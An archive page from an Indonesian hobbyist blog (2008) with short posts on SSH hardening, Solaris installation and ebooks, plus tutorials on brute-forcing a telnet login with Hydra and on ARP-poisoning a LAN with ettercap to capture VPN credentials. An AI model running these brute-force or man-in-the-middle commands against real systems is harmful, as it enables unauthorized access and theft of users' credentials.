Archive

Archive for August, 2008

Securing ssh server

August 19th, 2008 Comments off

Lets move ………

sesuai dengan topik.kali ini yang akan di jelaskan adalah cara mengamankan ssh server,,,,,
ssh merupakakan protocol autentikasi yang memungkinkan seseorang me-remote komputer yang menjalankan service ssh ( misalnya openssh)..

cara2 untuk mengamankan komputer yang menjalankan service ssh adalah :

1. edit file sshd_conf ( vim /etc/ssh/sshd_conf )
2. berikut adalah variabe2 yang harus diganti :
– ganti variable “port 22″ ke variable “port misalnya port 123

Port 2222

– ganti variable “PermitRootLogin yes” menjadi “PermitRootLogin no” dan aktifkan pilihan StrictModes

PermitRootLogin no
StrictModes

hal ini untuk mencegah akses root / administaror ke server..kenapa..??? ini bisa di manfaatkan oleh “orang yang tidak bertanggung jawab” untuk melakukan bruteforce”..
Read more…

Categories: security & hacking Tags:

BruteFoce With Hydra

August 19th, 2008 No comments

nulis lagi nulis lagi……tapi gpp…soalnya lagi senang bangat nulis…

kali ini saya coba menjeskan tentang cara bruteforce password dengan hydra,,,,
hydra adalah tools bruteforce yang sangat2 terkenal di kalangan para dedemit maya…untuk info lebih lanjut tentang hydra
silahkan lihat di situs resminya

hydra sendiri terbagi menjadi 2 mode penggunaan,yaitu mode text dan mode grafik ( gui )…
kali ini yang akan saya jelaskan adalah cara menggunakan hydra pada modus text..
hydra bisa digunakan untuk melakukan password cracking ( bruteforce method ) pada berbagai maca protocol..mulai dari cisco,telnet,sshv2,snmp,http metode get dll..
kebetulan hydra yang saya gukanan adalah hydra versi baru yang uda ada pada backtrack 3..
Ok here we go…………………..

ini adalah output hydra ketika di ketik pada console backtrack,,

bt ~ # hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, “n” for null password, “s” try login as pass
-C FILE colon seperated “login:pass” format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs – use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org

basic dari penggunaan hydra misalnya :

hydra IP_target protocol -l username -P password list -v(verbose options)

contohnya
bila kita ingin melakukan password cracking pada mesin windows yang menjalakan servis telnet,maka cara bruteforce dengan hydra misalnya :

hydra 10.14.10.2 telnet -l Administrator -P wordlist -v

Categories: security & hacking Tags:

Hacking Virtual Private Network…

August 19th, 2008 No comments

ehhhhhhhhhhhmmmmmmm,,,,,

ok,kali ini saya akan menjelaskan tentang cara hacking vpn connection dengan tujuan untuk mendapatkan username dan password untuk melakukan koneksi ke serper vpn….
recruitment :
1.linux backtrack
2.cokelat ( buat cemilan,,hhahaha )
3.green teah…kekna asyik juga…:D
berikut adalah data2 detail mengenai jaringan yang akan di hack.
– ip server vpn 192.168.1.1
– gateway LAN 10.14.10.1
– ip attacker 10.14.10.6
– ip target 10.14.10.4

Ok kita mulai saja aksinya..cieeeeeeee………..

1.kita harus meredirect traffic korban.yang tadinya dari komputer target —-> gateway —- >server vpn menjadi
komputer target ——-> komputer attacker —–> gateway ——> server vpn.
teknik ini sering dinamakan dengan arp poisoning……
tools yang saya gunakan ettercap.kebetulan uda ada di dalam backtack..so tinggal di pake doang..
disini saya menggunakan ettercap pada modus text…soalnya lebih enak seh..wkwkwkwkkw
contoh sintaxnya ettercap -T -q -M ARP /ip target/ /ip gateway/
jadi pada kasus ini akan menjadi ettercap -T -q -M ARP /10.14.10.4/ /10.14.10.1/
– Optiosn T : modus text
– Options -q ; ettercap di jalankan pada keadaan tenang / outputnya tdak terlalu banyak
– Options -M : menggunakan teknik ARP spoofing
output dari sintax di atas adalah
ettercap run...!!!!!
Read more…

Categories: security & hacking Tags:

Free Solaris ebook

August 16th, 2008 No comments

1.Solaris 10: The Complete Reference (Complete Reference Series)

Download

2. Solaris 9 Administration: A Beginner’s Guide

Download

3 Kumpulan berbagai ebook lihat Disini

Categories: Learning Solaris Tags:

Installing SunSolaris

August 16th, 2008 No comments

Sebeleum melakukan instalasi, ada beberapa system recruitment diantaranya :
* RAM ( memory) yang akan di gunakan minimal 512 MB
* Space Hard drive m,inimal 10 GB
* Kecepatan CPU minimal 400 MHz
* Mempunyai DVD /Cdrom drive

Sebelum melakukan insalasi tentunya harus punya installer sun solaris..kalau mau gratis silahkan download di http://mirror.its.ac.id/pub/ISO/Solaris
disini saya menggunakan SunSolaris 10 x86( DVD ) yang sesuai dengan Spek komputer saya..
Langsung aja dech..

1.Masukan CD/DVD sun solaris
2.Set komputer anda agar bisa boot dari DVD/CDrom
3.setelah boot dari CD/DVD maka akan muncul tulisan

Loading stage 2....
GNU GRUB version 0.95 ( xxK lower /
xxK upper memory)

4.Setelah itu akan muncul dialog bootloader grub seperti

Solaris
Solaris Serial Console ttya (headless and rack-mounted systems only)
Solaris Serial Console ttyb (for1x50, v60x and v65x)

pilih pada bagian pertama ( Solaris ) terus tekan enter
Read more…

Categories: Learning Solaris Tags: